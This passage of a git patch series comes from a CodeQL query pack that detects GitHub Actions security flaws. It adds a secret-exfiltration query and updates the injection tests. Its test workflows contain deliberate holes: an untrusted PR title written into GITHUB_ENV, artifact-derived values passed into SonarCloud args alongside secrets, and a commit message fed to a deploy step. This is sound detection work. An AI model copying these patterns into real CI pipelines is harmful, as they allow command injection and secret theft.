TITLE: ${{ github.event.pull_request.title }} + run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "$TITLE" >> "${GITHUB_ENV}" echo "EOF" >> "${GITHUB_ENV}" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" + - run: | + cat <<-"EOF" >> "$GITHUB_ENV" + echo "$TITLE" + EOF diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 32379a7264f7..31a550e37565 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -18,5 +20,9 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 77db4c10344d..527808d10b04 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -18,6 +20,10 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | @@ -27,3 +33,5 @@ subpaths | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | | .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index bf515674d903..c9f814139a00 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | @@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 6ba7a1c714ae..35b27172db67 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | @@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | From e45010ec5bdcbff5f5136b85cb75ae1a7d1e8e0d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:54 +0200 Subject: [PATCH 172/707] Add Secret exfiltration query --- .../security/SecretExfiltrationQuery.qll | 22 ++++++++ ...rSource_sonarcloud-github-action.model.yml | 7 +++ ql/src/Security/CWE-200/SecretExfiltration.ql | 22 ++++++++ .../CWE-200/.github/workflows/test1.yml | 50 +++++++++++++++++++ .../CWE-200/SecretExfiltration.expected | 22 ++++++++ .../Security/CWE-200/SecretExfiltration.qlref | 2 + 6 files changed, 125 insertions(+) create mode 100644 ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll create mode 100644 ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml create mode 100644 ql/src/Security/CWE-200/SecretExfiltration.ql create mode 100644 ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll new file mode 100644 index 000000000000..1886af435cfb --- /dev/null +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.DataFlow + +private class SecretExfiltrationSink extends DataFlow::Node { + SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") } +} + +/** + * A taint-tracking configuration for untrusted data that reaches a sink where it may lead to secret exfiltration + */ +private module SecretExfiltrationConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof SecretExfiltrationSink } +} + +/** Tracks flow of unsafe user input that is used in a context where it may lead to a secret exfiltration. */ +module SecretExfiltrationFlow = TaintTracking::Global; diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml new file mode 100644 index 000000000000..0220f0d54d84 --- /dev/null +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] + diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql new file mode 100644 index 000000000000..a6d1c18b733a --- /dev/null +++ b/ql/src/Security/CWE-200/SecretExfiltration.ql @@ -0,0 +1,22 @@ +/** + * @name Secret exfiltration + * @description Secrets may be exfiltrated by an attacker who can control the data sent to an external service. + * @kind path-problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/secret-exfiltration + * @tags actions + * security + * external/cwe/cwe-200 + */ + +import actions +import codeql.actions.security.SecretExfiltrationQuery +import SecretExfiltrationFlow::PathGraph + +from SecretExfiltrationFlow::PathNode source, SecretExfiltrationFlow::PathNode sink +where SecretExfiltrationFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml new file mode 100644 index 000000000000..21e7aac47686 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml @@ -0,0 +1,50 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected new file mode 100644 index 000000000000..3fbc081a0f42 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -0,0 +1,22 @@ +edges +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | +nodes +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +subpaths +#select +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref new file mode 100644 index 000000000000..cd179c0f1e6b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -0,0 +1,2 @@ +Security/CWE-200/SecretExfiltration.ql + From 25eace71bf1d327464b57db88cfaabc5f27d82d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:08:41 +0200 Subject: [PATCH 173/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5b3952ce96b..ff8e02aa63e1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.10 +version: 0.0.11 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7c1cc78df4a3..c769ea06d0b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.10 +version: 0.0.11 groups: - actions - queries From 9ecda65e32762519d4c2d89b309cb8a6532b7073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 16 Apr 2024 11:41:53 +0200 Subject: [PATCH 174/707] Update Priv workflow definition --- ql/lib/codeql-pack.lock.yml | 16 ---- ql/lib/codeql/actions/Ast.qll | 13 ++- .../.github/workflows/documentation.yml | 87 +++++++++++++++++++ .../CWE-078/CommandInjection.expected | 1 + .../PrivilegedCommandInjection.expected | 2 + .../CWE-094/.github/workflows/inter-job4.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 2 + .../CWE-094/PrivilegedCodeInjection.expected | 2 - 8 files changed, 102 insertions(+), 23 deletions(-) delete mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml deleted file mode 100644 index 56f10b81e0c7..000000000000 --- a/ql/lib/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.7 - codeql/dataflow: - version: 0.1.7 - codeql/ssa: - version: 0.2.7 - codeql/typetracking: - version: 0.2.7 - codeql/util: - version: 0.2.7 - codeql/yaml: - version: 0.2.7 -compiled: false diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index edee4d03eb4c..7e1bfdee589a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -208,19 +208,21 @@ class Workflow extends AstNode instanceof WorkflowImpl { predicate hasSingleTrigger(string trigger) { this.getATriggerEvent() = trigger and - count(string t | this.getATriggerEvent() = t | t) = 1 + count(this.getATriggerEvent()) = 1 } predicate isPrivileged() { // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" and + this.getPermissions().getAPermission() = "write" + or // The Workflow accesses a secret exists(SecretsExpression expr | expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or // The Workflow is triggered by an event other than `pull_request` - not this.hasSingleTrigger("pull_request") + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -228,8 +230,11 @@ class Workflow extends AstNode instanceof WorkflowImpl { exists(ExternalJob call, Workflow caller | call.getCallee() = this.getLocation().getFile().getRelativePath() and caller = call.getWorkflow() and - not caller.hasSingleTrigger("pull_request") + caller.isPrivileged() ) + or + // The Workflow has multiple triggers so at least one is ont "pull_request" + count(this.getATriggerEvent()) > 1 } } diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml new file mode 100644 index 000000000000..46ffbce96280 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml @@ -0,0 +1,87 @@ +name: Documentation + +on: + workflow_dispatch: + workflow_call: + +jobs: + parse_commit_info: + runs-on: ubuntu-latest + outputs: + can_deploy: ${{ steps.decide.outputs.can_deploy }} + deploy_to: ${{ steps.decide.outputs.deploy_to }} + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Copy build utils + run: | + cp -r .github/utils ../utils + + - name: Decide Whether to Build and/or Release + id: decide + run: | + set -xe + CAN_DEPLOY=$(python ../utils/please.py can_i_deploy_documentation) + DEPLOY_TO=$(python ../utils/please.py where_can_i_deploy_documentation) + + echo "can_deploy=$CAN_DEPLOY" >> $GITHUB_OUTPUT + echo "deploy_to=$DEPLOY_TO" >> $GITHUB_OUTPUT + echo github.ref ${{ github.ref }} + + build-documentation: + runs-on: ubuntu-latest + needs: parse_commit_info + + strategy: + matrix: + python-version: [3.11] + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + + - name: Install Quarto + uses: quarto-dev/quarto-actions/setup@v2 + with: + version: pre-release + + - name: Install Package + shell: bash + run: | + make doc-deps + + - name: Environment Information + shell: bash + run: | + ls -la + ls -la doc + pip list + + - name: Build docs + shell: bash + run: | + pushd doc; make doc; popd + + - name: Environment Information + shell: bash + run: | + ls -la doc + cat doc/_variables.yml + ls -la doc/reference + + - name: Deploy to Documentation to a Branch + uses: JamesIves/github-pages-deploy-action@v4 + if: contains(needs.parse_commit_info.outputs.can_deploy, 'true') + with: + folder: doc/_site + branch: ${{ needs.parse_commit_info.outputs.deploy_to }} + commit-message: ${{ github.event.head_commit.message }} diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index 99ebb1edc05d..ebbf2f7cf0b2 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -1,5 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected index 13d146a2570f..8829557368bb 100644 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected @@ -1,6 +1,8 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index aad2d171c1af..b964bb78dac3 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index c9f814139a00..f242e0e9e689 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -234,4 +234,6 @@ nodes subpaths #select | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | 